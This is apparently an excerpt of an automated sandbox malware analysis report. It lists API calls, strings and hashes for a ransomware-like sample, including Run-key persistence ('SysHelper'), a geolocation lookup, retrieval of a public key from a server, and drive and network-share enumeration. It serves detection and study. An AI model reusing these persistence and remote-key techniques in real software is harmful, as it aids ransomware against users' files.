                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                                                            • API String ID: 3668891214-3807497772
                                                                                                                            • Opcode ID: d24ff90f7e5ad87ba96df983101bba47e13cf8b13e9c61dda1230c82ce692d42
                                                                                                                            • Instruction ID: 787d830c2b5e2ce615324755450eae9124196e81027ba0ca24750faa4ac12bb8
                                                                                                                            • Opcode Fuzzy Hash: d24ff90f7e5ad87ba96df983101bba47e13cf8b13e9c61dda1230c82ce692d42
                                                                                                                            • Instruction Fuzzy Hash: 7D318D71E0121DAFDB10AFA59C45EEEBBB8EF89704F10006AFA04F2150DA74DA05DFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM ref: 00E4F15E
                                                                                                                            • Sleep.KERNEL32(?), ref: 00E4F185
                                                                                                                            • Sleep.KERNEL32(?), ref: 00E4F19D
                                                                                                                            • SendMessageW.USER32(?,00008003,00000000,00000000), ref: 00E4F9D0
                                                                                                                              • Part of subcall function 00E40A50: GetLogicalDrives.KERNEL32 ref: 00E40A75
                                                                                                                              • Part of subcall function 00E40A50: SetErrorMode.KERNEL32(00000001,00F30234,00000002), ref: 00E40AE2
                                                                                                                              • Part of subcall function 00E40A50: PathFileExistsA.SHLWAPI(?), ref: 00E40AF9
                                                                                                                              • Part of subcall function 00E40A50: SetErrorMode.KERNEL32(00000000), ref: 00E40B02
                                                                                                                              • Part of subcall function 00E40A50: GetDriveTypeA.KERNEL32(?), ref: 00E40B1B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorModeSleep$DriveDrivesExistsFileLogicalMessagePathSendTimeTypetime
                                                                                                                            • String ID: C:\
                                                                                                                            • API String ID: 3672571082-3404278061
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00E3CF4A
                                                                                                                            • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00E3CF5F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E3CFA6
                                                                                                                            • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00E3CFCD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E3CFDA
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E3CFDD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                                            • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                                            • API String ID: 1485416377-933853286
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00E4BB49
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00E4BBBA
                                                                                                                            • _malloc.LIBCMT ref: 00E4BBE4
                                                                                                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 00E4BBF4
                                                                                                                            • _free.LIBCMT ref: 00E4BCD7
                                                                                                                              • Part of subcall function 00E41CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D12
                                                                                                                              • Part of subcall function 00E41CD0: _memset.LIBCMT ref: 00E41D3B
                                                                                                                              • Part of subcall function 00E41CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00E41D63
                                                                                                                              • Part of subcall function 00E41CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EFAC68,000000FF), ref: 00E41D6C
                                                                                                                              • Part of subcall function 00E41CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00E41DD6
                                                                                                                              • Part of subcall function 00E41CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00E41E48
                                                                                                                            • IsWindow.USER32(?), ref: 00E4BF69
                                                                                                                            • DestroyWindow.USER32(?), ref: 00E4BF7B
                                                                                                                            • DefWindowProcW.USER32(?,00008003,?,?), ref: 00E4BFA8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3873257347-0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E50FDD: __wfsopen.LIBCMT ref: 00E50FE8
                                                                                                                            • _fgetws.LIBCMT ref: 00E3C7BC
                                                                                                                            • _memmove.LIBCMT ref: 00E3C89F
                                                                                                                            • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00E3C94B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2864494435-54166481
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00E4E6D4), ref: 00E3C6C2
                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00E3C6F3
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E3C700
                                                                                                                            • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00E3C725
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E3C72E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseValue$OpenQuery
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                                            • API String ID: 3962714758-1667468722
                                                                                                                            • Opcode ID: e71a4d1166f4c5cd6e8b3b5dc0c72c0b4057c559218bfe5c4a5eb42acd2d68b9
                                                                                                                            • Instruction ID: a2294586897cec3cd5a7c2b64d9c91e63990d59618ce1cc93be24e0bae2f46d5
                                                                                                                            • Opcode Fuzzy Hash: e71a4d1166f4c5cd6e8b3b5dc0c72c0b4057c559218bfe5c4a5eb42acd2d68b9
                                                                                                                            • Instruction Fuzzy Hash: D3115E7094020CFFDB119F90DD09FEEBB78EB00704F2001A5EA00B2191D7715A19EB54
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00E4E707
                                                                                                                              • Part of subcall function 00E3C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E3C51B
                                                                                                                            • InternetOpenW.WININET ref: 00E4E743
                                                                                                                            • _wcsstr.LIBCMT ref: 00E4E7AE
                                                                                                                            • _memmove.LIBCMT ref: 00E4E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00E4E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 00E4E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E4E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E4E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00E4E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00E4EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 00E4EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EB7C
                                                                                                                            • _malloc.LIBCMT ref: 00E4EB86
                                                                                                                            • _memset.LIBCMT ref: 00E4EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00E4EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EBB6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EC32
                                                                                                                            Strings
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                                            • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 2805819797-1771568745
                                                                                                                            • Opcode ID: 30bf13d43eaf930ad4106a574af34d32fd48b5e2c3344190f891d59bef4d2bdc
                                                                                                                            • Instruction ID: da15d86998a47ca82b0e03318fa0fad0703a6e2c129988b7504d35fa4ca2f32b
                                                                                                                            • Opcode Fuzzy Hash: 30bf13d43eaf930ad4106a574af34d32fd48b5e2c3344190f891d59bef4d2bdc
                                                                                                                            • Instruction Fuzzy Hash: AE015231548395AAD630DF20AC09BEFBBD8BF91744F145859F984B2282EB70E60CD763
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,00E4EE2F), ref: 00E41B1E
                                                                                                                            • timeGetTime.WINMM(?,?,00E4EE2F), ref: 00E41B29
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41B4C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E41B5C
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E41B6A
                                                                                                                            • Sleep.KERNEL32(00000064,?,?,00E4EE2F), ref: 00E41B72
                                                                                                                            • timeGetTime.WINMM(?,?,00E4EE2F), ref: 00E41B78
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3697694649-0
                                                                                                                            • Opcode ID: f7274aa3dd2f83e04f9754fa18187dda5ce836342dd51c75c332f1e156f729f6
                                                                                                                            • Instruction ID: 0f99d25bdd155cdbe6bb52922e0b7f559eecad5f48510bb43963ba9fc79a4aa7
                                                                                                                            • Opcode Fuzzy Hash: f7274aa3dd2f83e04f9754fa18187dda5ce836342dd51c75c332f1e156f729f6
                                                                                                                            • Instruction Fuzzy Hash: 53017132A41319EADF20E7E69D41FEDB768EB48B84F2440A5E600B7180E660A945CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E3C51B
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3C539
                                                                                                                            Strings
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Path$AppendFolder
                                                                                                                            • String ID: bowsakkdestx.txt
                                                                                                                            • API String ID: 29327785-2616962270
                                                                                                                            • Opcode ID: 1289e7d611b6241f7437375ab8ac2a303778f969b6a49acb32a1e7752d84cfc7
                                                                                                                            • Instruction ID: 531c650a10fc7b8d4d305ef5f4dce2e289ccbe35c8e853248f9ee3852d1840c3
                                                                                                                            • Opcode Fuzzy Hash: 1289e7d611b6241f7437375ab8ac2a303778f969b6a49acb32a1e7752d84cfc7
                                                                                                                            • Instruction Fuzzy Hash: 35113AB2B4122832D93075796C4BFEB779C8B42762F5010E5FE0CB2182A562955D42E2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00E4BAAD
                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00E4BABE
                                                                                                                            • UpdateWindow.USER32(00000000), ref: 00E4BAC5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateShowUpdate
                                                                                                                            • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                                            • API String ID: 2944774295-3503800400
                                                                                                                            • Opcode ID: cee6216ee9fe61060ba93fe64fffb14e88d64196a4ad68df7e7b730973270bd0
                                                                                                                            • Instruction ID: c40694c18a4d33ff7f7c4e734244ffcb190aa8e9576f0c780e2669b80b9b15aa
                                                                                                                            • Opcode Fuzzy Hash: cee6216ee9fe61060ba93fe64fffb14e88d64196a4ad68df7e7b730973270bd0
                                                                                                                            • Instruction Fuzzy Hash: E4E04F316827247BE23157157D0BFA63514EB42F50F314049FB00792D0C6E1AA85AA8D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00E40C12
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00E40C39
                                                                                                                            • _memset.LIBCMT ref: 00E40C4C
                                                                                                                            • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00E40C63
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 364255426-0
                                                                                                                            • Opcode ID: d119db349db79b48cada6bd0dd7af17798ff4bea467cb7fab4c4200d844bdeea
                                                                                                                            • Instruction ID: 82f692007d05f7166164228d8f8c399e0a81a1f4fc240d87e3954971e8a79786
                                                                                                                            • Opcode Fuzzy Hash: d119db349db79b48cada6bd0dd7af17798ff4bea467cb7fab4c4200d844bdeea
                                                                                                                            • Instruction Fuzzy Hash: DB91D075A083418FD728DF68E891B6BB7E1FFC4708F14592DF58AA7281D770A904CB52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 00E71726
                                                                                                                            • _strlen.LIBCMT ref: 00E71734
                                                                                                                              • Part of subcall function 00E55208: __getptd_noexit.LIBCMT ref: 00E55208
                                                                                                                            • _strnlen.LIBCMT ref: 00E717BF
                                                                                                                            • __lock.LIBCMT ref: 00E717D0
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 00E717DB
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2168648987-0
                                                                                                                            • Opcode ID: 93cf89e6195d7130d0427bd8328942147dc9d77ad0a05daf6b9a2b19b6ba58b0
                                                                                                                            • Instruction ID: 104d77bbfd4df93def1c70c6eb9a092e445cba303d1ed7507bfcd89904d3c76c
                                                                                                                            • Opcode Fuzzy Hash: 93cf89e6195d7130d0427bd8328942147dc9d77ad0a05daf6b9a2b19b6ba58b0
                                                                                                                            • Instruction Fuzzy Hash: 88312936601325AADB297BBCDC02B9F26E45F06B25F14A596FC08FB181DF74C80147A1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00E40A75
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00F30234,00000002), ref: 00E40AE2
                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00E40AF9
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00E40B02
                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 00E40B1B
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560635915-0
                                                                                                                            • Opcode ID: 6424b92dbe0ccd5be868923614728ff2492f8386e942ce76f197ae29c0954583
                                                                                                                            • Instruction ID: 63a5d5a4b2c37382973c3555cca902073d545834c9625c6feff13ffaf63801dd
                                                                                                                            • Opcode Fuzzy Hash: 6424b92dbe0ccd5be868923614728ff2492f8386e942ce76f197ae29c0954583
                                                                                                                            • Instruction Fuzzy Hash: 4941E1715083409FC710DF68D895B1BBBE4FB85718F601A2CF585A62A2D7B5D608CB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000,00000000,?,?), ref: 00E3F125
                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00E3F198
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000), ref: 00E3F1A1
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E3F1A8
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1421093161-0
                                                                                                                            • Opcode ID: e6319b732f70153bbac7b18bfe10da01860e879c3b69a4ffe44834f097b732f5
                                                                                                                            • Instruction ID: fe77713c5110b8116960dabdcad7ce5a571a74d1dd756929ec16c3f29e04a84c
                                                                                                                            • Opcode Fuzzy Hash: e6319b732f70153bbac7b18bfe10da01860e879c3b69a4ffe44834f097b732f5
                                                                                                                            • Instruction Fuzzy Hash: C231F571D00208EFDB149F68DC4ABAE7BB8EF05704F604128F905771D2E7716A49CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00E4B1BA
                                                                                                                              • Part of subcall function 00E411C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00E4120F
                                                                                                                              • Part of subcall function 00E411C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00E41228
                                                                                                                              • Part of subcall function 00E411C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E4123D
                                                                                                                              • Part of subcall function 00E411C0: MoveFileW.KERNEL32(00000000,?), ref: 00E41277
                                                                                                                              • Part of subcall function 00E4BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00E4BA4A
                                                                                                                              • Part of subcall function 00E4BA10: RegisterClassExW.USER32(00000030), ref: 00E4BA73
                                                                                                                              • Part of subcall function 00E4BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00E4BAAD
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4B4B3
                                                                                                                            • TranslateMessage.USER32(?), ref: 00E4B4CD
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00E4B4D7
                                                                                                                            Strings
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                                            • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                                            • API String ID: 441990211-897913220
                                                                                                                            • Opcode ID: f9d91de368f6c34e37101d136c280da3b29687e03864c324c596bb1b4642b711
                                                                                                                            • Instruction ID: a4ac82654830d743b03f585232538a745c3f16912dfe6ac6d8caadf98e52f101
                                                                                                                            • Opcode Fuzzy Hash: f9d91de368f6c34e37101d136c280da3b29687e03864c324c596bb1b4642b711
                                                                                                                            • Instruction Fuzzy Hash: DC5141315142449BC718FF70E862AEEB7E8BF94344F90582DF556631A2EF70A609CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fputws$CreateDirectory
                                                                                                                            • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                                            • API String ID: 2590308727-54166481
                                                                                                                            • Opcode ID: 39e7dff5e14e889ad48a86b18848a007705cfe74a6023ae3cc88ec2cacdc6f78
                                                                                                                            • Instruction ID: d98080bd2011cde9d486042e7e28add58b88fcbc2f02b4f38056cd8e8e837611
                                                                                                                            • Opcode Fuzzy Hash: 39e7dff5e14e889ad48a86b18848a007705cfe74a6023ae3cc88ec2cacdc6f78
                                                                                                                            • Instruction Fuzzy Hash: 5811E2729003059BDB20DF64EC4979A7BE0AF40319F212929ED5A72191E372D928CBC3
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E3EF69
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • _malloc.LIBCMT ref: 00E3EF85
                                                                                                                            • _memset.LIBCMT ref: 00E3EF9B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _malloc$AllocateHeap_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3655941445-0
                                                                                                                            • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                            • Instruction ID: 1ed760316cf868d76ec756f9e33fe1fb5177211f99940289a88e1f8f2f991b85
                                                                                                                            • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                                            • Instruction Fuzzy Hash: 9F110A31600614DFCB10CF98C881B5ABBB5FF89310F1445A8E9459F396D771B916CBC1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00E53B64
                                                                                                                              • Part of subcall function 00E50C62: __FF_MSGBANNER.LIBCMT ref: 00E50C79
                                                                                                                              • Part of subcall function 00E50C62: __NMSG_WRITE.LIBCMT ref: 00E50C80
                                                                                                                              • Part of subcall function 00E50C62: RtlAllocateHeap.NTDLL(012D0000,00000000,00000001,00000000,00000000,00000000,?,00E58CF4,00000000,00000000,00000000,00000000,?,00E58BE1,00000018,00F37BD0), ref: 00E50CA5
                                                                                                                            • std::exception::exception.LIBCMT ref: 00E53B82
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E53B97
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
